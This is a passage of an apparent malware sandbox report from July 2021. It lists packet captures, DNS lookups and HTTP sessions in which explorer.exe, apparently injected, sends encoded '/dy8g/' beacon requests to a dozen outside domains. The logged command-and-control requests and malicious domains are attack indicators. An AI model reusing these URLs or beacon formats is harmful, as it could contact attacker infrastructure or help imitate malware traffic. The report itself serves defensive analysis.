                                                                  Jul 22, 2021 17:43:36.803443909 CEST4975380192.168.2.652.58.78.16
                                                                  Jul 22, 2021 17:43:36.847222090 CEST804975352.58.78.16192.168.2.6
                                                                  Jul 22, 2021 17:43:36.847250938 CEST804975352.58.78.16192.168.2.6
                                                                  Jul 22, 2021 17:43:36.847265005 CEST804975352.58.78.16192.168.2.6
                                                                  Jul 22, 2021 17:43:36.847419977 CEST4975380192.168.2.652.58.78.16
                                                                  Jul 22, 2021 17:43:36.847469091 CEST4975380192.168.2.652.58.78.16
                                                                  Jul 22, 2021 17:43:36.889657021 CEST804975352.58.78.16192.168.2.6
                                                                  Jul 22, 2021 17:43:46.990670919 CEST4975880192.168.2.634.102.136.180
                                                                  Jul 22, 2021 17:43:47.033973932 CEST804975834.102.136.180192.168.2.6
                                                                  Jul 22, 2021 17:43:47.034095049 CEST4975880192.168.2.634.102.136.180
                                                                  Jul 22, 2021 17:43:47.034261942 CEST4975880192.168.2.634.102.136.180
                                                                  Jul 22, 2021 17:43:47.077419043 CEST804975834.102.136.180192.168.2.6
                                                                  Jul 22, 2021 17:43:47.172086954 CEST804975834.102.136.180192.168.2.6
                                                                  Jul 22, 2021 17:43:47.172107935 CEST804975834.102.136.180192.168.2.6
                                                                  Jul 22, 2021 17:43:47.172236919 CEST4975880192.168.2.634.102.136.180
                                                                  Jul 22, 2021 17:43:47.172348976 CEST4975880192.168.2.634.102.136.180
                                                                  Jul 22, 2021 17:43:47.214202881 CEST804975834.102.136.180192.168.2.6
                                                                  Jul 22, 2021 17:43:57.808830023 CEST4976080192.168.2.6119.59.120.26
                                                                  Jul 22, 2021 17:43:58.053662062 CEST8049760119.59.120.26192.168.2.6
                                                                  Jul 22, 2021 17:43:58.053909063 CEST4976080192.168.2.6119.59.120.26
                                                                  Jul 22, 2021 17:43:58.054111004 CEST4976080192.168.2.6119.59.120.26
                                                                  Jul 22, 2021 17:43:58.297991991 CEST8049760119.59.120.26192.168.2.6
                                                                  Jul 22, 2021 17:43:58.298029900 CEST8049760119.59.120.26192.168.2.6
                                                                  Jul 22, 2021 17:43:58.298044920 CEST8049760119.59.120.26192.168.2.6
                                                                  Jul 22, 2021 17:43:58.298280001 CEST4976080192.168.2.6119.59.120.26
                                                                  Jul 22, 2021 17:43:58.298341036 CEST4976080192.168.2.6119.59.120.26
                                                                  Jul 22, 2021 17:43:58.542184114 CEST8049760119.59.120.26192.168.2.6
                                                                  Jul 22, 2021 17:44:03.474526882 CEST4976180192.168.2.662.149.128.40
                                                                  Jul 22, 2021 17:44:03.542164087 CEST804976162.149.128.40192.168.2.6
                                                                  Jul 22, 2021 17:44:03.542320967 CEST4976180192.168.2.662.149.128.40
                                                                  Jul 22, 2021 17:44:03.542511940 CEST4976180192.168.2.662.149.128.40
                                                                  Jul 22, 2021 17:44:03.612077951 CEST804976162.149.128.40192.168.2.6
                                                                  Jul 22, 2021 17:44:03.612123013 CEST804976162.149.128.40192.168.2.6
                                                                  Jul 22, 2021 17:44:03.612144947 CEST804976162.149.128.40192.168.2.6
                                                                  Jul 22, 2021 17:44:03.612165928 CEST804976162.149.128.40192.168.2.6
                                                                  Jul 22, 2021 17:44:03.612847090 CEST4976180192.168.2.662.149.128.40
                                                                  Jul 22, 2021 17:44:03.612873077 CEST4976180192.168.2.662.149.128.40
                                                                  Jul 22, 2021 17:44:03.692063093 CEST804976162.149.128.40192.168.2.6
                                                                  Jul 22, 2021 17:44:08.996076107 CEST4976280192.168.2.6103.138.88.11
                                                                  Jul 22, 2021 17:44:09.255644083 CEST8049762103.138.88.11192.168.2.6
                                                                  Jul 22, 2021 17:44:09.255965948 CEST4976280192.168.2.6103.138.88.11
                                                                  Jul 22, 2021 17:44:09.256103992 CEST4976280192.168.2.6103.138.88.11
                                                                  Jul 22, 2021 17:44:09.551270008 CEST8049762103.138.88.11192.168.2.6
                                                                  Jul 22, 2021 17:44:09.556632996 CEST8049762103.138.88.11192.168.2.6
                                                                  Jul 22, 2021 17:44:09.556662083 CEST8049762103.138.88.11192.168.2.6
                                                                  Jul 22, 2021 17:44:09.556957006 CEST4976280192.168.2.6103.138.88.11
                                                                  Jul 22, 2021 17:44:09.556978941 CEST4976280192.168.2.6103.138.88.11
                                                                  Jul 22, 2021 17:44:09.871092081 CEST8049762103.138.88.11192.168.2.6
                                                                  Jul 22, 2021 17:44:14.757420063 CEST4976380192.168.2.6162.241.62.54
                                                                  Jul 22, 2021 17:44:14.926631927 CEST8049763162.241.62.54192.168.2.6
                                                                  Jul 22, 2021 17:44:14.926965952 CEST4976380192.168.2.6162.241.62.54
                                                                  Jul 22, 2021 17:44:14.927139997 CEST4976380192.168.2.6162.241.62.54
                                                                  Jul 22, 2021 17:44:15.094000101 CEST8049763162.241.62.54192.168.2.6
                                                                  Jul 22, 2021 17:44:15.440208912 CEST4976380192.168.2.6162.241.62.54
                                                                  Jul 22, 2021 17:44:15.647013903 CEST8049763162.241.62.54192.168.2.6
                                                                  Jul 22, 2021 17:44:15.720453024 CEST8049763162.241.62.54192.168.2.6
                                                                  Jul 22, 2021 17:44:15.720489979 CEST8049763162.241.62.54192.168.2.6
                                                                  Jul 22, 2021 17:44:15.720509052 CEST8049763162.241.62.54192.168.2.6
                                                                  Jul 22, 2021 17:44:15.720535994 CEST4976380192.168.2.6162.241.62.54
                                                                  Jul 22, 2021 17:44:15.720561028 CEST4976380192.168.2.6162.241.62.54
                                                                  Jul 22, 2021 17:44:15.720598936 CEST4976380192.168.2.6162.241.62.54
                                                                  Jul 22, 2021 17:44:15.730438948 CEST8049763162.241.62.54192.168.2.6
                                                                  Jul 22, 2021 17:44:15.730526924 CEST4976380192.168.2.6162.241.62.54
                                                                  Jul 22, 2021 17:44:15.730544090 CEST8049763162.241.62.54192.168.2.6
                                                                  Jul 22, 2021 17:44:15.730595112 CEST4976380192.168.2.6162.241.62.54

                                                                  UDP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Jul 22, 2021 17:42:03.511848927 CEST4944853192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:42:03.569889069 CEST53494488.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:42:04.450882912 CEST6034253192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:42:04.500457048 CEST53603428.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:42:05.441169024 CEST6134653192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:42:05.491653919 CEST53613468.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:42:06.618273020 CEST5177453192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:42:06.677932024 CEST53517748.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:42:06.793505907 CEST5602353192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:42:06.852504969 CEST53560238.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:42:08.337930918 CEST5838453192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:42:08.397641897 CEST53583848.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:42:09.781018019 CEST6026153192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:42:09.830863953 CEST53602618.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:42:10.985940933 CEST5606153192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:42:11.043087959 CEST53560618.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:42:12.190715075 CEST5833653192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:42:12.243096113 CEST53583368.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:42:13.402030945 CEST5378153192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:42:13.451323032 CEST53537818.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:42:14.271378994 CEST5406453192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:42:14.330457926 CEST53540648.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:42:15.578588963 CEST5281153192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:42:15.636074066 CEST53528118.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:42:16.940037966 CEST5529953192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:42:16.990402937 CEST53552998.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:42:18.087132931 CEST6374553192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:42:18.137650013 CEST53637458.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:42:19.463337898 CEST5005553192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:42:19.515728951 CEST53500558.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:42:20.275600910 CEST6137453192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:42:20.325866938 CEST53613748.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:42:21.392210960 CEST5033953192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:42:21.450920105 CEST53503398.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:42:23.156260014 CEST6330753192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:42:23.216284990 CEST53633078.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:42:39.544902086 CEST4969453192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:42:39.607366085 CEST53496948.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:42:57.953447104 CEST5498253192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:42:58.013339043 CEST53549828.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:42:59.305155993 CEST5001053192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:42:59.362071991 CEST53500108.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:43:10.196938038 CEST6371853192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:43:10.256752968 CEST53637188.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:43:11.126398087 CEST6211653192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:43:11.301726103 CEST6381653192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:43:11.337713003 CEST53621168.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:43:11.413774014 CEST53638168.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:43:12.377896070 CEST5501453192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:43:12.434833050 CEST53550148.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:43:12.910334110 CEST6220853192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:43:12.985701084 CEST53622088.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:43:13.392081022 CEST5757453192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:43:13.452209949 CEST53575748.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:43:14.429198027 CEST5181853192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:43:14.528397083 CEST5662853192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:43:14.586556911 CEST53566288.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:43:14.637433052 CEST53518188.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:43:15.729002953 CEST6077853192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:43:15.786372900 CEST53607788.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:43:16.234397888 CEST5379953192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:43:16.294121981 CEST53537998.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:43:16.988153934 CEST5468353192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:43:17.037671089 CEST53546838.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:43:18.265986919 CEST5932953192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:43:18.327318907 CEST53593298.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:43:19.089314938 CEST6402153192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:43:19.146363020 CEST53640218.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:43:21.120238066 CEST5612953192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:43:21.179997921 CEST53561298.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:43:22.011571884 CEST5817753192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:43:22.072957039 CEST53581778.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:43:23.938721895 CEST5070053192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:43:24.086940050 CEST53507008.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:43:29.505934000 CEST5406953192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:43:30.544126987 CEST5406953192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:43:31.544264078 CEST5406953192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:43:31.679512024 CEST53540698.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:43:31.749258995 CEST53540698.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:43:32.341495037 CEST53540698.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:43:36.693537951 CEST6117853192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:43:36.758774996 CEST53611788.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:43:40.869638920 CEST5701753192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:43:40.941163063 CEST53570178.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:43:44.985136032 CEST5632753192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:43:45.052967072 CEST53563278.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:43:46.928169966 CEST5024353192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:43:46.989679098 CEST53502438.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:43:47.187015057 CEST6205553192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:43:47.252425909 CEST53620558.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:43:52.184102058 CEST6124953192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:43:52.401670933 CEST53612498.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:43:57.417082071 CEST6525253192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:43:57.807579994 CEST53652528.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:44:03.409462929 CEST6436753192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:44:03.471841097 CEST53643678.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:44:08.630681038 CEST5506653192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:44:08.993699074 CEST53550668.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:44:14.569951057 CEST6021153192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:44:14.755909920 CEST53602118.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:44:20.458342075 CEST5657053192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:44:20.523808956 CEST53565708.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:44:25.974387884 CEST5845453192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:44:26.063608885 CEST53584548.8.8.8192.168.2.6

                                                                  ICMP Packets

                                                                  TimestampSource IPDest IPChecksumCodeType
                                                                  Jul 22, 2021 17:43:31.750777006 CEST192.168.2.68.8.8.8cfff(Port unreachable)Destination Unreachable

                                                                  DNS Queries

                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                  Jul 22, 2021 17:43:11.126398087 CEST192.168.2.68.8.8.80x1866Standard query (0)www.aizaibali.comA (IP address)IN (0x0001)
                                                                  Jul 22, 2021 17:43:14.429198027 CEST192.168.2.68.8.8.80xd048Standard query (0)www.aizaibali.comA (IP address)IN (0x0001)
                                                                  Jul 22, 2021 17:43:18.265986919 CEST192.168.2.68.8.8.80x82afStandard query (0)www.extinctionbrews.comA (IP address)IN (0x0001)
                                                                  Jul 22, 2021 17:43:23.938721895 CEST192.168.2.68.8.8.80x64c8Standard query (0)www.doityourselfism.comA (IP address)IN (0x0001)
                                                                  Jul 22, 2021 17:43:29.505934000 CEST192.168.2.68.8.8.80xac29Standard query (0)www.xn--vuq722jwngjre.comA (IP address)IN (0x0001)
                                                                  Jul 22, 2021 17:43:30.544126987 CEST192.168.2.68.8.8.80xac29Standard query (0)www.xn--vuq722jwngjre.comA (IP address)IN (0x0001)
                                                                  Jul 22, 2021 17:43:31.544264078 CEST192.168.2.68.8.8.80xac29Standard query (0)www.xn--vuq722jwngjre.comA (IP address)IN (0x0001)
                                                                  Jul 22, 2021 17:43:36.693537951 CEST192.168.2.68.8.8.80xe600Standard query (0)www.ecofingers.comA (IP address)IN (0x0001)
                                                                  Jul 22, 2021 17:43:46.928169966 CEST192.168.2.68.8.8.80xef2dStandard query (0)www.invisiongc.netA (IP address)IN (0x0001)
                                                                  Jul 22, 2021 17:43:52.184102058 CEST192.168.2.68.8.8.80x3cefStandard query (0)www.oikoschain.comA (IP address)IN (0x0001)
                                                                  Jul 22, 2021 17:43:57.417082071 CEST192.168.2.68.8.8.80xfbfcStandard query (0)www.findfoodshop.comA (IP address)IN (0x0001)
                                                                  Jul 22, 2021 17:44:03.409462929 CEST192.168.2.68.8.8.80xa966Standard query (0)www.scuolatua.comA (IP address)IN (0x0001)
                                                                  Jul 22, 2021 17:44:08.630681038 CEST192.168.2.68.8.8.80x71e5Standard query (0)www.okinawarongnho.comA (IP address)IN (0x0001)
                                                                  Jul 22, 2021 17:44:14.569951057 CEST192.168.2.68.8.8.80xf647Standard query (0)www.jorgeporcayo.comA (IP address)IN (0x0001)
                                                                  Jul 22, 2021 17:44:20.458342075 CEST192.168.2.68.8.8.80x9ea4Standard query (0)www.wthcoffee.comA (IP address)IN (0x0001)
                                                                  Jul 22, 2021 17:44:25.974387884 CEST192.168.2.68.8.8.80x669dStandard query (0)www.cwdelrio.comA (IP address)IN (0x0001)

                                                                  DNS Answers

                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                  Jul 22, 2021 17:43:11.337713003 CEST8.8.8.8192.168.2.60x1866No error (0)www.aizaibali.com154.88.31.204A (IP address)IN (0x0001)
                                                                  Jul 22, 2021 17:43:14.637433052 CEST8.8.8.8192.168.2.60xd048No error (0)www.aizaibali.com154.88.31.204A (IP address)IN (0x0001)
                                                                  Jul 22, 2021 17:43:18.327318907 CEST8.8.8.8192.168.2.60x82afNo error (0)www.extinctionbrews.comextinctionbrews.comCNAME (Canonical name)IN (0x0001)
                                                                  Jul 22, 2021 17:43:18.327318907 CEST8.8.8.8192.168.2.60x82afNo error (0)extinctionbrews.com34.102.136.180A (IP address)IN (0x0001)
                                                                  Jul 22, 2021 17:43:24.086940050 CEST8.8.8.8192.168.2.60x64c8No error (0)www.doityourselfism.comdoityourselfism.comCNAME (Canonical name)IN (0x0001)
                                                                  Jul 22, 2021 17:43:24.086940050 CEST8.8.8.8192.168.2.60x64c8No error (0)doityourselfism.com169.62.77.158A (IP address)IN (0x0001)
                                                                  Jul 22, 2021 17:43:31.679512024 CEST8.8.8.8192.168.2.60xac29Server failure (2)www.xn--vuq722jwngjre.comnonenoneA (IP address)IN (0x0001)
                                                                  Jul 22, 2021 17:43:31.749258995 CEST8.8.8.8192.168.2.60xac29Server failure (2)www.xn--vuq722jwngjre.comnonenoneA (IP address)IN (0x0001)
                                                                  Jul 22, 2021 17:43:32.341495037 CEST8.8.8.8192.168.2.60xac29Server failure (2)www.xn--vuq722jwngjre.comnonenoneA (IP address)IN (0x0001)
                                                                  Jul 22, 2021 17:43:36.758774996 CEST8.8.8.8192.168.2.60xe600No error (0)www.ecofingers.com52.58.78.16A (IP address)IN (0x0001)
                                                                  Jul 22, 2021 17:43:46.989679098 CEST8.8.8.8192.168.2.60xef2dNo error (0)www.invisiongc.netinvisiongc.netCNAME (Canonical name)IN (0x0001)
                                                                  Jul 22, 2021 17:43:46.989679098 CEST8.8.8.8192.168.2.60xef2dNo error (0)invisiongc.net34.102.136.180A (IP address)IN (0x0001)
                                                                  Jul 22, 2021 17:43:52.401670933 CEST8.8.8.8192.168.2.60x3cefName error (3)www.oikoschain.comnonenoneA (IP address)IN (0x0001)
                                                                  Jul 22, 2021 17:43:57.807579994 CEST8.8.8.8192.168.2.60xfbfcNo error (0)www.findfoodshop.com119.59.120.26A (IP address)IN (0x0001)
                                                                  Jul 22, 2021 17:44:03.471841097 CEST8.8.8.8192.168.2.60xa966No error (0)www.scuolatua.com62.149.128.40A (IP address)IN (0x0001)
                                                                  Jul 22, 2021 17:44:08.993699074 CEST8.8.8.8192.168.2.60x71e5No error (0)www.okinawarongnho.comokinawarongnho.comCNAME (Canonical name)IN (0x0001)
                                                                  Jul 22, 2021 17:44:08.993699074 CEST8.8.8.8192.168.2.60x71e5No error (0)okinawarongnho.com103.138.88.11A (IP address)IN (0x0001)
                                                                  Jul 22, 2021 17:44:14.755909920 CEST8.8.8.8192.168.2.60xf647No error (0)www.jorgeporcayo.comjorgeporcayo.comCNAME (Canonical name)IN (0x0001)
                                                                  Jul 22, 2021 17:44:14.755909920 CEST8.8.8.8192.168.2.60xf647No error (0)jorgeporcayo.com162.241.62.54A (IP address)IN (0x0001)
                                                                  Jul 22, 2021 17:44:20.523808956 CEST8.8.8.8192.168.2.60x9ea4No error (0)www.wthcoffee.comwthcoffee.comCNAME (Canonical name)IN (0x0001)
                                                                  Jul 22, 2021 17:44:20.523808956 CEST8.8.8.8192.168.2.60x9ea4No error (0)wthcoffee.com184.168.131.241A (IP address)IN (0x0001)
                                                                  Jul 22, 2021 17:44:26.063608885 CEST8.8.8.8192.168.2.60x669dName error (3)www.cwdelrio.comnonenoneA (IP address)IN (0x0001)

                                                                  HTTP Request Dependency Graph

                                                                  • www.extinctionbrews.com
                                                                  • www.doityourselfism.com
                                                                  • www.ecofingers.com
                                                                  • www.invisiongc.net
                                                                  • www.findfoodshop.com
                                                                  • www.scuolatua.com
                                                                  • www.okinawarongnho.com
                                                                  • www.jorgeporcayo.com

                                                                  HTTP Packets

                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  0192.168.2.64974834.102.136.18080C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Jul 22, 2021 17:43:18.792526960 CEST4239OUTGET /dy8g/?i0GDM=DjnY/S7/G1yk/GGdjnbMG0pwlAlipgBY8a8MDSEvYTAaE8/8s3MkSQswoGP3cSH4hj9/IphBwA==&0X=C6Ah3vPx HTTP/1.1
                                                                  Host: www.extinctionbrews.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Jul 22, 2021 17:43:18.931600094 CEST4240INHTTP/1.1 403 Forbidden
                                                                  Server: openresty
                                                                  Date: Thu, 22 Jul 2021 15:43:18 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 275
                                                                  ETag: "60ef6789-113"
                                                                  Via: 1.1 google
                                                                  Connection: close
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  1192.168.2.649752169.62.77.15880C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Jul 22, 2021 17:43:24.283298969 CEST7468OUTGET /dy8g/?i0GDM=Y4JBfBjBKMGzbUzrNu+ARLK4ZQab+dap1kq40YSvqSzyJ/mfRg4U9+Lz1eKJfRLK3cAmaa0bkw==&0X=C6Ah3vPx HTTP/1.1
                                                                  Host: www.doityourselfism.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Jul 22, 2021 17:43:24.475476027 CEST7469INHTTP/1.1 302 Found
                                                                  Date: Thu, 22 Jul 2021 15:43:24 GMT
                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16 mod_apreq2-20090110/2.8.0 mod_perl/2.0.11 Perl/v5.16.3
                                                                  Location: http://ww1.doityourselfism.com/?i0GDM=Y4JBfBjBKMGzbUzrNu+ARLK4ZQab+dap1kq40YSvqSzyJ/mfRg4U9+Lz1eKJfRLK3cAmaa0bkw==&0X=C6Ah3vPx
                                                                  Content-Length: 314
                                                                  Connection: close
                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 31 2e 64 6f 69 74 79 6f 75 72 73 65 6c 66 69 73 6d 2e 63 6f 6d 2f 3f 69 30 47 44 4d 3d 59 34 4a 42 66 42 6a 42 4b 4d 47 7a 62 55 7a 72 4e 75 2b 41 52 4c 4b 34 5a 51 61 62 2b 64 61 70 31 6b 71 34 30 59 53 76 71 53 7a 79 4a 2f 6d 66 52 67 34 55 39 2b 4c 7a 31 65 4b 4a 66 52 4c 4b 33 63 41 6d 61 61 30 62 6b 77 3d 3d 26 61 6d 70 3b 30 58 3d 43 36 41 68 33 76 50 78 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://ww1.doityourselfism.com/?i0GDM=Y4JBfBjBKMGzbUzrNu+ARLK4ZQab+dap1kq40YSvqSzyJ/mfRg4U9+Lz1eKJfRLK3cAmaa0bkw==&amp;0X=C6Ah3vPx">here</a>.</p></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  2192.168.2.64975352.58.78.1680C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Jul 22, 2021 17:43:36.803443909 CEST10370OUTGET /dy8g/?i0GDM=X9Az7RthaT8xdqkxQ6tJRjQeFUHqBPh6fb7YU5dnwYv1rghxnAYW3P4f0krKlocv9Wl7uwWiww==&0X=C6Ah3vPx HTTP/1.1
                                                                  Host: www.ecofingers.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Jul 22, 2021 17:43:36.847250938 CEST10370INHTTP/1.1 410 Gone
                                                                  Server: openresty
                                                                  Date: Thu, 22 Jul 2021 15:41:50 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
